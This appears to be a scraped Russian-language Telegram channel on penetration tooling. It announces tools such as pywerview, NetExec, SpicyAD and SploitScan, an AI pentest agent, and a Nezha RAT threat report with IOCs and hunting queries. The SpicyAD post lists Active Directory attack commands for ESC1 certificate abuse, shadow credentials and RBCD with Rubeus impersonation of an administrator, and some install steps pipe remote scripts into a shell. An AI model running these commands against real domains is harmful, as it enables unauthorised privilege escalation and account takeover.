Securelist
Using DCOM objects for remote command execution
Kaspersky expert describes how DCOM interfaces can be abused to load malicious DLLs into memory using the Windows Registry and Control Panel.
If you’re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects
#windows #dcom
Please open Telegram to view this post
VIEW IN TELEGRAM
RouterOS security analyzer for detecting misconfigurations, weak settings, and known vulnerabilities (CVE)
#network #mikrotik #routeros
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2
GitHub
GitHub - the-useless-one/pywerview: A (partial) Python rewriting of PowerSploit's PowerView
A (partial) Python rewriting of PowerSploit's PowerView - the-useless-one/pywerview
Частично переписанный на Python PowerView из PowerSploit
Установка:
git clone https://github.com/the-useless-one/pywerview
cd pywerview
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
./pywerview.py --help
#pywerview #soft #ad
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
EVA is an AI-assisted penetration testing agent that enhances offensive security workflows by providing structured attack guidance, contextual analysis, and multi-backend AI integration
Установка:
# Ollama for local endpoint (optional)
curl -fsSL https://ollama.ai/install.sh | shr
# EVA installation
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
./eva.py
# Adding it to PATH to be acessible anywhere
sudo mv eva.py /usr/local/bin/eva
#ai #eva #agent
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Инструмент для проведения пентеста
Огромное количество изменений:
▪️ Built-in LDAP signing and channel binding checks▪️ RDP command execution▪️ certipy find integration▪️ raisechild module: automatic forest priv esc▪️ Dumping LSA/SAM via MSSQL▪️ etc
Установка в
sudo apt update && sudo apt install netexec
#nxc #netexec #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤1
Ontinue
Nezha: The Monitoring Tool That's Also a Perfect RAT
Research from Ontinue reveals how Nezha, a legitimate open-source monitoring tool, is being abused by attackers as a stealthy post-exploitation RAT.
Self-hosted, lightweight server and website monitoring and O&M tool. Detection only occurs when attackers execute commands through the agent
IOCs:
nz.632313373[.]xyz:8008
47.79.42[.]91
8008 - Default Nezha dashboard port
443 - Common alternative (46% of deployments)
80 - Common alternative (28% of deployments)
8888 - Alternative port
18008 - Alternative port
C:\nezha\nezha-agent.exe
C:\nezha\config.yml
C:\temp\nezha-agent.exe
C:\nezha.zip
/opt/nezha/agent/nezha-agent
/opt/nezha/agent/config.yml
nezha-agent.exe
nezha-agent
nezha_agent
services.exe → nezha-agent.exe
powershell.exe → nezha-agent.exe
nezha-agent.exe → powershell.exe
nezha-agent.exe → cmd.exe
nezha-agent.exe → whoami.exe
nezha-agent.exe → systeminfo.exe
nezha-agent.exe → net.exe
nezha-agent.exe -c C:\nezha\config.yml
client_secret
NZ_SERVER
NZ_CLIENT_SECRET
NZ_TLS
nezhahq
Queries:
// Hunt for Nezha agent process execution and file paths
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "nezha_agent")
or FolderPath has_any ("\\nezha\\", "/nezha/", "/opt/nezha/")
or ProcessCommandLine has_any ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
| project TimeGenerated, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, InitiatingProcessFileName
| order by TimeGenerated desc
// Hunt for network connections to Nezha default ports and known infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemotePort in (8008, 8888, 18008)
or RemoteUrl has_any ("nezha", "nezhahq")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl, ActionType
| order by TimeGenerated desc
// Hunt for Nezha configuration files and agent binaries on disk
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "config.yml")
or FolderPath has_any ("\\nezha\\", "/opt/nezha/", "C:\\nezha")
| project TimeGenerated, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
#nezha #ioc #detection #ti
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🤔2👍1🔥1
Довольно интересный инструмент, работает в интерактивном или режиме командной строки
SpicyAD is a C# Active Directory penetration testing tool designed for authorized security assessments. It combines multiple AD attack techniques into a single, easy-to-use tool with both interactive and command-line interfaces
Примеры:
# 1. Enumerate vulnerable templates
.\SpicyAD.exe enum-vulns
# 2. Exploit ESC1 (auto-chains to PKINIT)
.\SpicyAD.exe esc1 /template:ESC1 /target:administrator /sid
# 1. Add shadow credential to target machine
.\SpicyAD.exe shadow-creds add /target:SERVER$ /sid
# 1. Set RBCD
.\SpicyAD.exe rbcd set /target:SERVER$ /controlled:YOURPC$
# 2. Use Rubeus for S4U
Rubeus.exe s4u /user:YOURPC$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/SERVER.evilcorp.net /ptt
# 3. Access target
dir \\SERVER\C$
# 4. Cleanup
.\SpicyAD.exe rbcd clear /target:SERVER$ /force
#ad #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2
The Ten Most Critical Web Application Security Risks
#owasp #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Forwarded from HaHacking
• SERVER-SIDE
• CLIENT-SIDE
• ADVANCED
Сборники информации:🔖 DingyShark/BurpSuiteCertifiedPractitioner🔖 botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
Райтапы лабораторий:📖 frank-leitner/portswigger-websecurity-academy📖 thelicato/portswigger-labs
Сделайте доброе дело – докиньте свои райтапы в базу!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных сканеров
sudo apt install sploitscan
Установка:
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPi:
pip install --user sploitscan
Источники PoC'ов:
➡️ GitHub➡️ ExploitDB➡️ VulnCheck (нужен free API key)➡️ Packet Storm➡️ Nuclei
Импорт из:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
В конфиге указываем API ключи поддерживаемых сервисов (config.json)
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}Поиск по CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Поиск по ключевым словам:
sploitscan -k "Outlook Express"
Импорт и экспорт:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
Помощь AI:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍2
▪️ Вендор - XSpeeder (китайский производитель)▪️ Уязвимый продукт - прошивка SXZOS, которая используется в устройствах SD-WAN, маршрутизаторах и оборудовании для сетевой инфраструктуры▪️ Тип - удалённое выполнение кода без аутентификации (pre-authentication RCE)▪️ CVSS - 9,8
#poc #cve
Please open Telegram to view this post
VIEW IN TELEGRAM